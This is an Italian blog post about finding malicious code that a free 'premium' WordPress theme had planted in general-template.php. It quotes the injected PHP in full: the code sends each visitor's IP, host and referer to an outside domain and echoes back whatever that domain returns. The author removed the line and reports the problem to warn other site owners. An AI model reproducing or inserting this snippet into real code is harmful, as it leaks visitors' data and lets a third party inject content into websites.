WordPress: un errore da veri esperti, quello di HireWordPressExperts.com e 24365online.com

La manutenzione di tutte le installazioni WordPress e’ oramai un must quasi giornaliero; qualche giorno fa su Music Project ho notato un errore, una chiamata ad una funzione esterna ma non ho dato peso alla cosa: la mia connessione in quel momento era lenta e poteva benissimo essere colpa mia.

Oggi invece noto che l’errore era sempre la’:

Warning: file_get_contents(http://24365online.com/_YTG_yu/_dl/get_info.php?
host=musicproject.virg0.org&referer=http:^^musicproject.virg0.org^&visitor_ip=
84.55.236.247) [function.file-get-contents]: failed to open stream:
HTTP request failed! HTTP/1.1 500 Internal Server Error in /srv/d_virg0/www/
musicproject.virg0.org/htdocs/wp-includes/general-template.php on line 61

Ho dato una controllata generale ma non mi risultava niente di sbagliato, almeno nei files sidebar.php, header.php, footer.php e index.php; sono stati i primi ad essere controllati, a volte potrebbe scappare qualche tag di chiusura, qualche virgoletta o altro. Ricontrollo l’errore generato: 24365online.com.. che roba e’?
Sono certa di non avere niente che richiama quell’URL!
Ricontrollo le widgets per vedere se qualcosa lo richiama e finalmente mi dedico al controllo della pagina chiamata in causa: general-template.php:

 function get_footer( $name = null ) {/***HWEDLC***/
			$host = $_SERVER["HTTP_HOST"];
				$referer = $_SERVER["HTTP_REFERER"];
				$referer = str_replace("/","^",$referer);$referer = str_replace("&","<<>>",$referer);
				$document = $_SERVER["DOCUMENT_ROOT"];
				$visitor_ip = $_SERVER["REMOTE_ADDR"];
				$url = "http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip";
				$content = file_get_contents($url);
				echo  $content;
				/***HWEDLC***/
	do_action( 'get_footer', $name );

Alla riga 61 c’e’ la chiamata all’URL in questione: 24365online.com che, visitatolo, presenta un laconico “Bandwidth Exceeded“.  Tolta definitivamente la riga 61 tutto funziona correttamente.

Ma come ha fatto quella stringa a combinare tutto questo putiferio?
Googlando mi sono imbattura nel blog The Spirit of Humppa, un vecchio post parlava proprio di questo problema. Il sito HireWordPressExperts.com propone una serie di plugin e temi per WP (garantiti Premium e scaricabili free) che avevo scaricato ed installato prima di scegliere il tema definitivo per VMP (Koi, di Nick La).
Il tema che avvo installato e poi deattivato passa informazioni sui visitatori ad un altro sito.. e la cosa fa davvero poco onore a quelli di HWPE!

La soluzione e’ comunque comoda e veloce e non richiede grandi skill in campo WP o PHP, ma un controllino andrebbe sempre ripetuto, soprattutto quando si scaricano dei temi nuovi, anche dal sito ufficiale di WordPress, che ovviamente non ha il controllo su tutto il codice di tutti i temi pronti per il download; in caso trovaste  altri temi che contengano lo stesso errore potete tranquillamente visitare la loro sezione dei contatti per riportare il problema e far si che il tema incriminato venga eliminato dal loro archivio.

full-stack graphic designer | social media manager | blogger, autrice e saggista | appassionata di Giappone, poker e pianoforte | mai senza occhiali da sole | attaccabrighe per natura